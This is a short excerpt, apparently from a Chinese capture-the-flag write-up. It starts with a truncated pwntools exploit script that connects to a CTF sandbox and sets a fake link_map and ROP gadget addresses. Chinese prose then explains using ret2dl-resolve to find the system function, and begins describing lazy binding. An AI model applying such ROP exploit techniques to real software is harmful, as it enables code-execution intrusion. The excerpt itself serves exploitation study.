libc = ELF("./libc-2.27.so") p = remote("challenge-f236dc39487bb0bb.sandbox.ctfhub.com",37969) fakeLinkMap = 0x601030 + 0x110 # write to where rbp = fakeLinkMap-8 pop_rdi_ret = 0x400583 pop_rsi_r15_ret = 0x400581 main = 0x4004E7 ret = 0x4003de l_addr = abs(libc.sym...
由于程序中提供的函数符号有限,所以无法正常泄露出libc基址,需要ret2dl-resolve泄露libc函数地址,并使用其和system函数的偏移计算得到system函数。 延迟绑定技术 为避免在运行程序时加载过多的动态链接导致卡顿,操作系统实现了延迟绑定(Lazy Binding)的技术,只有在函数首次调用时才...